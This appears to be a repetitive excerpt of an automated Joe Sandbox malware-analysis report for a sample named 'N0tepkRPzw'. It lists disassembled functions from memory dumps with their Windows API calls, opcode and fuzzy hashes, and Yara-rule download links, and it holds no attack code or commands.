Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AddressProc__crt_fast_encode_pointer
String ID:
API String ID: 2279764990-0
Opcode ID: 8feec840b008e776f225eb98bb0a2db28331626f9fb083e3b5ed87a84b518e4c
Instruction ID: e9c04c81691f8a759be97110f2c964678a24eac0aa6b0c05e07b99f26527acb1
Opcode Fuzzy Hash: 8feec840b008e776f225eb98bb0a2db28331626f9fb083e3b5ed87a84b518e4c
Instruction Fuzzy Hash: 0611E733A112209B9F219E2CEC4585E73959BC032871A8620ED1DEB254FA72DC41C7F2

Function 00D59B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00D59B35,?,?,00000000,?,?,00D58D9C,?), ref: 00D59BC0
GetLastError.KERNEL32 ref: 00D59BCD

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: eb352023303af823261821c358d40e6372f957772a00a88ca60272625e9d2519
Instruction ID: 5c4b6c442f22186ffcced0f12a7606704e1526a9d8536e882381dfdacf5007dd
Opcode Fuzzy Hash: eb352023303af823261821c358d40e6372f957772a00a88ca60272625e9d2519
Instruction Fuzzy Hash: B701A131214315DB9F08CE65ACE496EF3A9AFC5722B18452DFD5687290DA31D80D9B31

Function 00D59E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00D59E76
GetLastError.KERNEL32 ref: 00D59E82

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 48e66a35290b2b294c09cf4c87b6c67b977cbd3c3756e579d14ae20cddfe1e0d
Instruction ID: 8e00f54615dcf8f9b43716f9248c4135030fdb3bc2806bb50f527de6d404066f
Opcode Fuzzy Hash: 48e66a35290b2b294c09cf4c87b6c67b977cbd3c3756e579d14ae20cddfe1e0d
Instruction Fuzzy Hash: 760180B17053009BEF349E29D85976BB6D99B84716F14493DB956C3680DA31DC4C8730

Function 00D78606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00D78627

Part of subcall function 00D78518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00D7C13D,00000000,?,00D767E2,?,00000008,?,00D789AD,?,?,?), ref: 00D7854A

HeapReAlloc.KERNEL32(00000000,?,?,?,?,00D90F50,00D5CE57,?,?,?,?,?,?), ref: 00D78663

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: Heap$AllocAllocate_free
String ID:
API String ID: 2447670028-0
Opcode ID: e12085e88b843d16eb6e8831d855f8dd0e43148efcbcd9b357a137ceb637f182
Instruction ID: 27f63203d9bfc7c015d868542eb206030e3362de8c85c7f3ab5a9de08a8a632c
Opcode Fuzzy Hash: e12085e88b843d16eb6e8831d855f8dd0e43148efcbcd9b357a137ceb637f182
Instruction Fuzzy Hash: 60F0C2325C1215B6DB212A25AC0DB6F2759DF91BA0F28C115F85C96191FF20C90076B5

Function 00D60908 Relevance: 3.0, APIs: 2, Instructions: 33COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?), ref: 00D60915
GetProcessAffinityMask.KERNEL32(00000000), ref: 00D6091C

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: 7c82a588498322a085b624c529760cdb81dd2cd74e7b7c5e8d73dd97bb8e2c5f
Instruction ID: 657d4a199ada195fde8546db399cf51ed5619b78fe9a651e49f79eac28c1e990
Opcode Fuzzy Hash: 7c82a588498322a085b624c529760cdb81dd2cd74e7b7c5e8d73dd97bb8e2c5f
Instruction Fuzzy Hash: 2AE09232A20209AB6F09CEA49C048BB7B9EEB0431072C417BA80AD3201F930DE018FB1

Function 00D5A444 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00D5A27A,?,?,?,00D5A113,?,00000001,00000000,?,?), ref: 00D5A458
SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00D5A27A,?,?,?,00D5A113,?,00000001,00000000,?,?), ref: 00D5A489

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7f7b4779543ee93b428c820c667367caef4d299d8f288441956f28079d96ab32
Instruction ID: 11ce78d721f6003fa753ade55dc7218d5c5be2cc0d461718065a7a96b5e666b7
Opcode Fuzzy Hash: 7f7b4779543ee93b428c820c667367caef4d299d8f288441956f28079d96ab32
Instruction Fuzzy Hash: 4BF08C312402197BDF015E60DC05BD9376CAB04782F088051BD8C96261DB728AA8AB70

Function 00D6D573 Relevance: 3.0, APIs: 2, Instructions: 29COMMON

Download Yara Rule

APIs

_swprintf.LIBCMT ref: 00D6D5A1
SetDlgItemTextW.USER32(00000065,?), ref: 00D6D5B8

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ItemText_swprintf
String ID:
API String ID: 3011073432-0
Opcode ID: e01e24f2a2eb43d1df972118bfa596fb509fe817d2429732da27f74bc6af7483
Instruction ID: 546ec629667dabe46a1e0e01247a81f9b13959b56ef8fe51bf6eb3e3d61a769e
Opcode Fuzzy Hash: e01e24f2a2eb43d1df972118bfa596fb509fe817d2429732da27f74bc6af7483
Instruction Fuzzy Hash: D5F05C319003487BDB11ABB09C02FA9371EDB05746F040642BA01D31A1D9316A504B72

Function 00D5A12D Relevance: 3.0, APIs: 2, Instructions: 28fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNELBASE(?,?,?,00D5984C,?,?,00D59688,?,?,?,?,00D81FA1,000000FF), ref: 00D5A13E
DeleteFileW.KERNEL32(?,?,?,00000800,?,?,00D5984C,?,?,00D59688,?,?,?,?,00D81FA1,000000FF), ref: 00D5A16C

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 2d1a010309e806c65199474cec398e6daa0403464d5dd821a4f82f44e380b5f9
Instruction ID: 7845a63ac9f2c5c2a81cfa7e32412ff187c55fac2c8aa3e5687da403ab606582
Opcode Fuzzy Hash: 2d1a010309e806c65199474cec398e6daa0403464d5dd821a4f82f44e380b5f9
Instruction Fuzzy Hash: 0FE092396903186BDF119F64DC41FE9775CEB08783F484065BC88C7160DF619D98ABB0

Function 00D6A39D Relevance: 3.0, APIs: 2, Instructions: 27comCOMMON

Download Yara Rule

APIs

GdiplusShutdown.GDIPLUS(?,?,?,?,00D81FA1,000000FF), ref: 00D6A3D1
OleUninitialize.OLE32(?,?,?,?,00D81FA1,000000FF), ref: 00D6A3D6

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: GdiplusShutdownUninitialize
String ID:
API String ID: 3856339756-0
Opcode ID: d5cf1712535e21d3fa1650d6d9c20ce581faba0912eecdcdd4aecef85cd7033b
Instruction ID: b2e49487ed64eff1832f1fb09674ce78ee2c49e374507c3dc40cb897f2687a6a
Opcode Fuzzy Hash: d5cf1712535e21d3fa1650d6d9c20ce581faba0912eecdcdd4aecef85cd7033b
Instruction Fuzzy Hash: 6AF01576618654EFC610AB4CDD05B19FBADFB89B20F04436AB419C3760CB7468118BA5

Function 00D5A194 Relevance: 3.0, APIs: 2, Instructions: 26COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(?,?,?,00D5A189,?,00D576B2,?,?,?,?), ref: 00D5A1A5
GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00D5A189,?,00D576B2,?,?,?,?), ref: 00D5A1D1

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 4f157e6e365f8cc530fe15fe6d6e2dca95e7b3b9ffacc376eb56c24eef414dc1
Instruction ID: 033bb52c54b04b465648dbf327cda55af573bafe89f8695f22ffd3fc8b07ebec
Opcode Fuzzy Hash: 4f157e6e365f8cc530fe15fe6d6e2dca95e7b3b9ffacc376eb56c24eef414dc1
Instruction Fuzzy Hash: 50E06D359002285BCB20AA689C05BD9B758EB087A2F0442A2BD5AE3290D6709D489BF1

Function 00D60085 Relevance: 3.0, APIs: 2, Instructions: 25libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00D600A0
LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00D5EB86,Crypt32.dll,00000000,00D5EC0A,?,?,00D5EBEC,?,?,?), ref: 00D600C2

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: e339455c195136a2ff76f7d5626da4c44aa9113ccaab42a168d6b5bc1875f765
Instruction ID: 653a41dfa7c1b7bd4e23ce782b5dd1adb3b874903a13c45ab82c15aea3e89444
Opcode Fuzzy Hash: e339455c195136a2ff76f7d5626da4c44aa9113ccaab42a168d6b5bc1875f765
Instruction Fuzzy Hash: 6EE0127691125C6BDB219AA49C05FD6776CEF09792F0400A6B948D3144DA749A448FB0

Function 00D69B0F Relevance: 3.0, APIs: 2, Instructions: 24windowCOMMON

Download Yara Rule

APIs

GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00D69B30
GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00D69B37

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: BitmapCreateFromGdipStream
String ID:
API String ID: 1918208029-0
Opcode ID: ed21fa345294753f039825004970c6cab0042040dbb23d9e02c1bdc8d4ea712f
Instruction ID: ddaafe7c2a653c49a7f1e22f19613ee01ea8b289cd9084db30a9ec8a49f466d3
Opcode Fuzzy Hash: ed21fa345294753f039825004970c6cab0042040dbb23d9e02c1bdc8d4ea712f
Instruction Fuzzy Hash: 1EE0ED75901218EFCB10DF98D541699B7ECEB08721F10815BE89597301E6B1AE049BB5

Function 00D7215C Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

Part of subcall function 00D7329A: try_get_function.LIBVCRUNTIME ref: 00D732AF

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00D7217A
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00D72185

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
String ID:
API String ID: 806969131-0
Opcode ID: 6ea62d2d9b3787f47c4168b1f7595dd0b9221eabcf4f7179028bbd01652ee996
Instruction ID: fc9a46047e55d898437a43156a95d98971ae8ff00090203dc1946468830f28e8
Opcode Fuzzy Hash: 6ea62d2d9b3787f47c4168b1f7595dd0b9221eabcf4f7179028bbd01652ee996
Instruction Fuzzy Hash: C3D0A928204392282A5827B028930B82344F962BB03E0CA46EA28CA2D2FE108008B131

Function 00D6DC67 Relevance: 3.0, APIs: 2, Instructions: 13COMMONLIBRARYCODE

Download Yara Rule

APIs

DloadLock.DELAYIMP ref: 00D6DC73
DloadProtectSection.DELAYIMP ref: 00D6DC8F

Part of subcall function 00D6DE67: DloadObtainSection.DELAYIMP ref: 00D6DE77

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: Dload$Section$LockObtainProtect
String ID:
API String ID: 731663317-0
Opcode ID: 1156c30e232aecb36ad7bb0d93afbe40f507c8c00f23772caa7c474d8c4f79d6
Instruction ID: a9d722b2143a8b0780d0deeb5470ae915893b86b6bf2fef2e2c1fc5b214937c9
Opcode Fuzzy Hash: 1156c30e232aecb36ad7bb0d93afbe40f507c8c00f23772caa7c474d8c4f79d6
Instruction Fuzzy Hash: 55D0C970F40344CFC251AF14B94675D3AB2F718744FA80641F246CA6A9DBA594C0C635

Function 00D512E6 Relevance: 3.0, APIs: 2, Instructions: 11COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00D512FB
ShowWindow.USER32(00000000), ref: 00D51302

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: ItemShowWindow
String ID:
API String ID: 3351165006-0
Opcode ID: c11f8145ce612b053bb4faee00ebd1b6d3a7f5ebddb3849a8284210517fcceed
Instruction ID: 01cf2f9a65faa7bad79904f7209b98d6a1c1bd80be07eca08262a6eaaaa1ce77
Opcode Fuzzy Hash: c11f8145ce612b053bb4faee00ebd1b6d3a7f5ebddb3849a8284210517fcceed
Instruction Fuzzy Hash: 05C01233058300FECB020BB4DC09D3FBBA8ABA4312F05CA08B2A5C0160C238C010DB21

Function 00D519A6 Relevance: 1.8, APIs: 1, Instructions: 310COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D519AB

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000D94000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639943215.0000000000DB1000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DB2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DC6000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1640013204.0000000000DF7000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d50000_N0tepkRPzw.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 08d344350a8fff4132392a224565502cc8d905ec28b628f0caa7ab950fb083e8
Instruction ID: ac2e58601c9de5e3553f2660455481519078a6d69e2fdcb28abe55f8ba6ed1b8
Opcode Fuzzy Hash: 08d344350a8fff4132392a224565502cc8d905ec28b628f0caa7ab950fb083e8
Instruction Fuzzy Hash: 4CC1BF38A042449FEF15CF68C484BB97BA5EF0A312F1C45BAEC45DB286DB319948CB71

Function 00D53B3D Relevance: 1.7, APIs: 1, Instructions: 176COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00D53B42

Memory Dump Source

Source File: 00000000.00000002.1639886743.0000000000D51000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000000.00000002.1639868596.0000000000D50000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639922764.0000000000D83000.00000002.00000001.01000000.00000003.sdmpDownload File
